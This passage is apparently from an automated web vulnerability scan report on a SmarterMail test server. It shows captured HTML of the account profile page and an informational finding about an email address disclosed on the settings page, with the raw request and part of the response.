           </tr><tr id="ctl00_MPH_wucContactInfo_txtCompanyZip">
               <td id="ctl00_MPH_wucContactInfo_txtCompanyZip_Label" class="Indent Fixed">Work Zip</td><td id="ctl00_MPH_wucContactInfo_txtCompanyZip_Setting" class="Setting"><input name="ctl00$MPH$wucContactInfo$txtCompanyZip_SettingText" type="text" size="30" id="ctl00_MPH_wucContactInfo_txtCompanyZip_SettingText" class="text" /></td>
           </tr><tr id="ctl00_MPH_wucContactInfo_txtCompanyCountry">
               <td id="ctl00_MPH_wucContactInfo_txtCompanyCountry_Label" class="Indent Fixed">Work Country</td><td id="ctl00_MPH_wucContactInfo_txtCompanyCountry_Setting" class="Setting"><input name="ctl00$MPH$wucContactInfo$txtCompanyCountry_SettingText" type="text" size="30" id="ctl00_MPH_wucContactInfo_txtCompanyCountry_SettingText" class="text" /></td>
           </tr><tr id="ctl00_MPH_wucContactInfo_txtCompanyUrl">
               <td id="ctl00_MPH_wucContactInfo_txtCompanyUrl_Label" class="Indent Fixed">Website</td><td id="ctl00_MPH_wucContactInfo_txtCompanyUrl_Setting" class="Setting"><input name="ctl00$MPH$wucContactInfo$txtCompanyUrl_SettingText" type="text" size="30" id="ctl00_MPH_wucContactInfo_txtCompanyUrl_SettingText" class="text" /></td>
           </tr>
       </table>
   </span></div>
   
   <div id='ctl00_MPH_wucContactInfo_pvAdditionalInfo' class='' style='display:none'>
       <span id="ctl00_MPH_wucContactInfo_pvAdditionalInfo">
       <table id="ctl00_MPH_wucContactInfo_SettingsContainer3" class="SettingsContainer SCMarginTop" border="0">
           <tr id="ctl00_MPH_wucContactInfo_txtAdditionalInfo">
               <td id="ctl00_MPH_wucContactInfo_txtAdditionalInfo_Setting" class="Indent Setting" colspan="2"><span class='Label'>Additional Info<br /></span><textarea name="ctl00$MPH$wucContactInfo$txtAdditionalInfo_SettingText" rows="12" cols="50" id="ctl00_MPH_wucContactInfo_txtAdditionalInfo_SettingText" class="text"></textarea></td>
           </tr>
       </table>
   </span></div>
   
   <div id='ctl00_MPH_wucContactInfo_pvCategories' class='' style='display:none'>
       <span id="ctl00_MPH_wucContactInfo_pvCategories">
       <div id="ctl00_MPH_wucContactInfo_UP1">
           
               <table id="ctl00_MPH_wucContactInfo_tblCategories" class="SettingsContainer SCMarginTop" border="0">

           </table>
               
               
               <a id="ctl00_MPH_wucContactInfo_lnkRefresh" href="javascript:__doPostBack('ctl00$MPH$wucContactInfo$lnkRefresh','')"></a>
           
       </div>
   </span></div>
   
</div>




   <div id="ctl00_MPH_Update2">

</div>

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('main/frmmyinfo', '');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       
   

<script type="text/javascript">
//<![CDATA[
UpdateSidebarCounts('UserSync', 0);
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fMain\x2ffrmMyInfo\x2easpx?'); });
WebForm_AutoFocus('ctl00_MPH_wucContactInfo_txtDisplayAs_SettingText');Sys.Application.initialize();
$(function() { SetTopTitle('Account\x20Profile\x20\x2d\x20hoytllc\x2ecom\x20\x2d\x20SmarterMail'); });
$(function() { $('#ctl00_TPH_TabStrip').hyperTabStrip({"MultiPageClientID":"ctl00_MPH_wucContactInfo_MP1","FunctionMap":{},"PageViewMap":{"ctl00_TPH_TabStrip_Tab1":"ctl00_MPH_wucContactInfo_pvBasicInfo","ctl00_TPH_TabStrip_Tab2":"ctl00_MPH_wucContactInfo_pvContactInfo","ctl00_TPH_TabStrip_Tab3":"ctl00_MPH_wucContactInfo_pvCompanyInfo","ctl00_TPH_TabStrip_Tab5":"ctl00_MPH_wucContactInfo_pvAdditionalInfo","ctl00_TPH_TabStrip_Tab4":"ctl00_MPH_wucContactInfo_pvCategories"},"ClientCallbacks":{}}); });
modules['vmNotBlank_txt']='Must have a value';
$(function() {$vc({"lt":"Display Name","vcID":"ctl00_MPH_wucContactInfo_txtDisplayAs_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},true);});
modules['vmOptional_txt']='Value is optional';
$(function() {$vc({"lt":"Title (Mr./Mrs./etc)","vcID":"ctl00_MPH_wucContactInfo_txtPersonNameTitle_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"First Name","vcID":"ctl00_MPH_wucContactInfo_txtFirstName_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Middle Name","vcID":"ctl00_MPH_wucContactInfo_txtMiddleName_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Last Name","vcID":"ctl00_MPH_wucContactInfo_txtLastName_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Suffix","vcID":"ctl00_MPH_wucContactInfo_txtPersonNameSuffix_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
modules['vmEmail_txt']='Must be an email address';
$(function() {$vc({"lt":"Other Email Address","vcID":"ctl00_MPH_wucContactInfo_txtEmailAddress_SettingText","VMs":["vmOptional","vmEmail"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Instant Messenger","vcID":"ctl00_MPH_wucContactInfo_txtInstantMessenger_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Home Page","vcID":"ctl00_MPH_wucContactInfo_txtWebPage_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateInput, {"_focused":false,"_originalValue":"","_postBackEventReferenceScript":"__doPostBack(\u0027ctl00$MPH$wucContactInfo$BirthDayPicker_SettingText\u0027,\u0027\u0027)","_skin":"SmarterTools","clientStateFieldID":"ctl00_MPH_wucContactInfo_BirthDayPicker_SettingText_dateInput_ClientState","dateFormat":"M/d/yyyy","dateFormatInfo":{"DayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"MonthNames":["January","February","March","April","May","June","July","August","September","October","November","December",""],"AbbreviatedDayNames":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"AbbreviatedMonthNames":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"AMDesignator":"AM","PMDesignator":"PM","DateSeparator":"/","TimeSeparator":":","FirstDayOfWeek":0,"DateSlots":{"Year":2,"Month":0,"Day":1},"ShortYearCenturyEnd":2029,"TimeInputOnly":false},"displayDateFormat":"M/d/yyyy","enabled":true,"incrementSettings":{InterceptArrowKeys:true,InterceptMouseWheel:true,Step:1},"maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00","styles":{HoveredStyle: ["width:100%;", "riTextBox riHover"],InvalidStyle: ["width:100%;", "riTextBox riError"],DisabledStyle: ["width:100%;", "riTextBox riDisabled"],FocusedStyle: ["width:100%;", "riTextBox riFocused"],EmptyMessageStyle: ["width:100%;", "riTextBox riEmpty"],ReadOnlyStyle: ["width:100%;", "riTextBox riRead"],EnabledStyle: ["width:100%;", "riTextBox riEnabled"]}}, null, null, $get("ctl00_MPH_wucContactInfo_BirthDayPicker_SettingText_dateInput"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadCalendar, {"_DayRenderChangedDays":{},"_FormatInfoArray":[["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],["January","February","March","April","May","June","July","August","September","October","November","December",""],["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"dddd, MMMM dd, yyyy h:mm:ss tt","dddd, MMMM dd, yyyy","h:mm:ss tt","MMMM dd","ddd, dd MMM yyyy HH\u0027:\u0027mm\u0027:\u0027ss \u0027GMT\u0027","M/d/yyyy","h:mm tt","yyyy\u0027-\u0027MM\u0027-\u0027dd\u0027T\u0027HH\u0027:\u0027mm\u0027:\u0027ss","yyyy\u0027-\u0027MM\u0027-\u0027dd HH\u0027:\u0027mm\u0027:\u0027ss\u0027Z\u0027","MMMM, yyyy","AM","PM","/",":",0],"_ViewRepeatableDays":{},"_ViewsHash":{"ctl00_MPH_wucContactInfo_BirthDayPicker_SettingText_calendar_Top" : [[2010,10,1], 1]},"_calendarWeekRule":0,"_culture":"en-US","_enableKeyboardNavigation":false,"_enableViewSelector":false,"_firstDayOfWeek":7,"_postBackCall":"__doPostBack(\u0027ctl00$MPH$wucContactInfo$BirthDayPicker_SettingText$calendar\u0027,\u0027@@\u0027)","clientStateFieldID":"ctl00_MPH_wucContactInfo_BirthDayPicker_SettingText_calendar_ClientState","enableMultiSelect":false,"enabled":true,"monthYearNavigationSettings":["Today","OK","Cancel","Date is out of range.","False","True","300","1","300","1"],"skin":"SmarterTools","specialDaysArray":[],"stylesHash":{"DayStyle": ["", ""],"CalendarTableStyle": ["", "rcMainTable"],"OtherMonthDayStyle": ["", "rcOtherMonth"],"TitleStyle": ["", ""],"SelectedDayStyle": ["", "rcSelected"],"SelectorStyle": ["", ""],"DisabledDayStyle": ["", "rcDisabled"],"OutOfRangeDayStyle": ["", "rcOutOfRange"],"WeekendDayStyle": ["", "rcWeekend"],"DayOverStyle": ["", "rcHover"],"FastNavigationStyle": ["", "RadCalendarMonthView RadCalendarMonthView_SmarterTools"],"ViewSelectorStyle": ["", "rcViewSel"]},"useColumnHeadersAsSelectors":false,"useRowHeadersAsSelectors":false}, null, null, $get("ctl00_MPH_wucContactInfo_BirthDayPicker_SettingText_calendar"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDatePicker, {"_PopupButtonSettings":{ ResolvedImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif", ResolvedHoverImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif"},"_animationSettings":{ShowAnimationDuration:300,ShowAnimationType:1,HideAnimationDuration:300,HideAnimationType:1},"_popupControlID":"ctl00_MPH_wucContactInfo_BirthDayPicker_SettingText_popupButton","clientStateFieldID":"ctl00_MPH_wucContactInfo_BirthDayPicker_SettingText_ClientState","focusedDate":"2010-10-02-00-00-00","maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00"}, null, {"calendar":"ctl00_MPH_wucContactInfo_BirthDayPicker_SettingText_calendar","dateInput":"ctl00_MPH_wucContactInfo_BirthDayPicker_SettingText_dateInput"}, $get("ctl00_MPH_wucContactInfo_BirthDayPicker_SettingText"));
});
$(function() {$vc({"lt":"Home Phone","vcID":"ctl00_MPH_wucContactInfo_txtHomePhone_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Work Phone","vcID":"ctl00_MPH_wucContactInfo_txtCompanyPhone_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Mobile Phone","vcID":"ctl00_MPH_wucContactInfo_txtMobilePhone_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Pager","vcID":"ctl00_MPH_wucContactInfo_txtCompanyPager_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Home Fax","vcID":"ctl00_MPH_wucContactInfo_txtHomeFax_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Work Fax","vcID":"ctl00_MPH_wucContactInfo_txtCompanyFax_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Home Address","vcID":"ctl00_MPH_wucContactInfo_txtHomeStreet_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Home City","vcID":"ctl00_MPH_wucContactInfo_txtHomeCity_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Home State","vcID":"ctl00_MPH_wucContactInfo_txtHomeState_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Home Zip","vcID":"ctl00_MPH_wucContactInfo_txtHomeZip_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Home Country","vcID":"ctl00_MPH_wucContactInfo_txtHomeCountry_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Company Name","vcID":"ctl00_MPH_wucContactInfo_txtCompanyName_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Job Title","vcID":"ctl00_MPH_wucContactInfo_txtJobTitle_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Department","vcID":"ctl00_MPH_wucContactInfo_txtCompanyDepartment_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Office","vcID":"ctl00_MPH_wucContactInfo_txtCompanyOffice_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Work Address","vcID":"ctl00_MPH_wucContactInfo_txtCompanyStreet_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Work City","vcID":"ctl00_MPH_wucContactInfo_txtCompanyCity_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Work State","vcID":"ctl00_MPH_wucContactInfo_txtCompanyState_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Work Zip","vcID":"ctl00_MPH_wucContactInfo_txtCompanyZip_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Work Country","vcID":"ctl00_MPH_wucContactInfo_txtCompanyCountry_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Website","vcID":"ctl00_MPH_wucContactInfo_txtCompanyUrl_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Additional Info","vcID":"ctl00_MPH_wucContactInfo_txtAdditionalInfo_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
//]]>
</script>
</form>
</body>
</html>


7.6. http://vulnerable.smartermail.site:9998/Main/frmMySettings.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smartermail.site:9998
Path:   /Main/frmMySettings.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Main/frmMySettings.aspx HTTP/1.1
Host: vulnerable.smartermail.site:9998
Proxy-Connection: keep-alive
Referer: http://vulnerable.smartermail.site:9998/Default.aspx?section=UserStorage
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=; settings=empty; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1757530132","TopBarSection":"UserSettings"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 01:58:55 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 56812



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Account Settings - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
   <form method="post" action="frmMySettings.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTMwNTY1MDYyMA8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWCgIDD2QWAgIBD2QWAgIDDw8WAh4HVmlzaWJsZWhkZAIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx8CaGQCBg8WAh8CaGQCBw9kFgJmD2QWAgIBDxYCHwJoFgICAQ8WAh4EVGV4dGVkAgkPZBYCAgEPZBYCZg9kFgICAQ9kFgJmD2QWDAICD2QWAgIBD2QWKGYPDxYCHgpfX3JlYWRPbmx5Z2QWAgIBD2QWAgICDw8WAh8EBQVkdW1teWRkAgEPDxYCHwJoZBYCAgEPZBYCZg8QZBAVAgtTbWFydGVyTWFpbBBBY3RpdmUgRGlyZWN0b3J5FQIBMAExFCsDAmdnFgFmZAICDw8WAh8CaGQWAgIBD2QWBGYPDxYCHwRlZGQCAg8PFgIfBGVkZAIDDw8WAh8CaGQWAgIBD2QWBGYPDxYCHwQFB0xMMTIzNDVkZAICDw8WAh8EBQdMTDEyMzQ1ZGQCBA9kFgICAQ9kFgJmDw9kFgIeDGF1dG9jb21wbGV0ZQUDb2ZmZAIFD2QWAgIBD2QWAmYPD2QWAh8GBQNvZmZkAgYPZBYCAgEPZBYCZg8PZBYCHwYFA29mZmQCBw9kFgICAQ9kFgICAg8PFgIfBAURZHVtbXlAaG95dGxsYy5jb21kZAIID2QWAgIBD2QWAgICDw8WAh8EBQExZGQCCQ9kFgICAQ9kFgJmDxBkEBVXKChHTVQtMTI6MDApIEludGVybmF0aW9uYWwgRGF0ZSBMaW5lIFdlc3QgKEdNVC0xMTowMCkgTWlkd2F5IElzbGFuZCwgU2Ftb2ESKEdNVC0xMDowMCkgSGF3YWlpEihHTVQtMDk6MDApIEFsYXNrYSQoR01ULTA4OjAwKSBUaWp1YW5hLCBCYWphIENhbGlmb3JuaWEmKEdNVC0wODowMCkgUGFjaWZpYyBUaW1lIChVUyAmIENhbmFkYSktKEdNVC0wNzowMCkgQ2hpaHVhaHVhLCBMYSBQYXosIE1hemF0bGFuIC0gTmV3JyhHTVQtMDc6MDApIE1vdW50YWluIFRpbWUgKFVTICYgQ2FuYWRhKRMoR01ULTA3OjAwKSBBcml6b25hLShHTVQtMDc6MDApIENoaWh1YWh1YSwgTGEgUGF6LCBNYXphdGxhbiAtIE9sZBgoR01ULTA2OjAwKSBTYXNrYXRjaGV3YW41KEdNVC0wNjowMCkgR3VhZGFsYWphcmEsIE1leGljbyBDaXR5LCBNb250ZXJyZXkgLSBPbGQmKEdNVC0wNjowMCkgQ2VudHJhbCBUaW1lIChVUyAmIENhbmFkYSk1KEdNVC0wNjowMCkgR3VhZGFsYWphcmEsIE1leGljbyBDaXR5LCBNb250ZXJyZXkgLSBOZXcbKEdNVC0wNjowMCkgQ2VudHJhbCBBbWVyaWNhJihHTVQtMDU6MDApIEVhc3Rlcm4gVGltZSAoVVMgJiBDYW5hZGEpGihHTVQtMDU6MDApIEluZGlhbmEgKEVhc3QpKyhHTVQtMDU6MDApIEJvZ290YSwgTGltYSwgUXVpdG8sIFJpbyBCcmFuY28TKEdNVC0wNDozMCkgQ2FyYWNhcxIoR01ULTA0OjAwKSBNYW5hdXMiKEdNVC0wNDowMCkgQXRsYW50aWMgVGltZSAoQ2FuYWRhKRIoR01ULTA0OjAwKSBMYSBQYXoUKEdNVC0wNDowMCkgU2FudGlhZ28YKEdNVC0wMzozMCkgTmV3Zm91bmRsYW5kJChHTVQtMDM6MDApIEJ1ZW5vcyBBaXJlcywgR2VvcmdldG93bhUoR01ULTAzOjAwKSBHcmVlbmxhbmQUKEdNVC0wMzowMCkgQnJhc2lsaWEWKEdNVC0wMzowMCkgTW9udGV2aWRlbxgoR01ULTAyOjAwKSBNaWQtQXRsYW50aWMSKEdNVC0wMTowMCkgQXpvcmVzGihHTVQtMDE6MDApIENhcGUgVmVyZGUgSXMuJShHTVQpIENhc2FibGFuY2EsIE1vbnJvdmlhLCBSZXlramF2aWs9KEdNVCkgR3JlZW53aWNoIE1lYW4gVGltZSA6IER1YmxpbiwgRWRpbmJ1cmdoLCBMaXNib24sIExvbmRvbj0oR01UKzAxOjAwKSBCZWxncmFkZSwgQnJhdGlzbGF2YSwgQnVkYXBlc3QsIExqdWJsamFuYSwgUHJhZ3VlLChHTVQrMDE6MDApIFNhcmFqZXZvLCBTa29wamUsIFdhcnNhdywgWmFncmViLyhHTVQrMDE6MDApIEJydXNzZWxzLCBDb3BlbmhhZ2Vu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MAMxOTMDMjAxAzE5NQMyMDMDMjA3AzIwNQMyMjUDMjEwAzIyNwMyMjADMjE1AzI0MAMyMzADMjM1AzI1MAMyNDUDMjc1AzI1NQMyNzADMjYwAzI2NQMyODADMjg1AzI5MAMzMDAUKwNXZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZGQCCg8PFgIfAmhkFgICAQ9kFgJmDxBkEBUDB0VuYWJsZWQWRGlzYWJsZSBhbmQgYWxsb3cgbWFpbBxEaXNhYmxlIGFuZCBkb24ndCBhbGxvdyBtYWlsFQMBMAExATIUKwMDZ2dnFgFmZAILDw8WAh8CaGQWAgIBD2QWBGYPDxYCHwQFAzEwMGRkAgMPDxYCHwQFAzEwMGRkAgwPDxYCHwJoZBYCAgEPZBYCZg8QDxYCHgdDaGVja2VkaGRkZGQCDQ8PFgIfAmhkFgICAQ9kFgJmDxAPFgIfB2hkZGRkAg4PZBYCAgEPZBYCZg8QDxYGHwQFIEVuYWJsZSBBY3RpdmVTeW5jIChOb3QgTGljZW5zZWQpHwdoHgdFbmFibGVkaGRkZGQCDw8PFgIfAmhkFgICAQ9kFgJmDxAPFgIfB2hkZGRkAhAPDxYCHwJoZBYCAgEPZBYCZg8QDxYCHwdnZGRkZAIRDw8WAh8CaGQWAgIBD2QWAmYPEA8WAh8HZ2RkZGQCEg8PFgIfAmhkFgICAQ9kFgJmDxAPFgIfB2hkZGRkAhMPDxYCHwJoZBYCAgEPZBYCZg8QDxYCHwdnZGRkZAIED2QWAgIBD2QWAmYPZBYCAgEPZBYCAgIPDxYCHwRlZGQCBg9kFgICAQ9kFgJmD2QWAgIBD2QWAmYPEGQPFgNmAgECAhYDEAUOTW92ZSB0byBGb2xkZXIFCmF1dG9jcmVhdGVnEAUaTW92ZSB0byBGb2xkZXIgKElmIEV4aXN0cyllZxAFDkxlYXZlIGluIEluYm94BQVpbmJveGdkZAIID2QWAgIBD2QWDmYPZBYCAgEPZBYCZg8QZBAVAg1NeSBUb2RheSBQYWdlCE15IEluYm94FQIFdG9kYXkFaW5ib3gUKwMCZ2dkZAIBD2QWAgIBD2QWAmYPEGQQFQIESFRNTARUZXh0FQIEaHRtbAVwbGFpbhQrAwJnZ2RkAgIPZBYCAgEPZBYCZg8QZBAVBARGcm9tB1N1YmplY3QEU2l6ZQREYXRlFQQERnJvbQdTdWJqZWN0BFNpemUMSW50ZXJuYWxEYXRlFCsDBGdnZ2dkZAIDD2QWAgIBD2QWAmYPEGQQFQQcTW92ZSB0byBEZWxldGVkIEl0ZW1zIEZvbGRlchFBdXRvIFB1cmdlIEZvbGRlcg9NYXJrIGFzIERlbGV0ZWQYTWFyayBhcyBEZWxldGVkIGFuZCBIaWRlFQQBMAExATIBMxQrAwRnZ2dnZGQC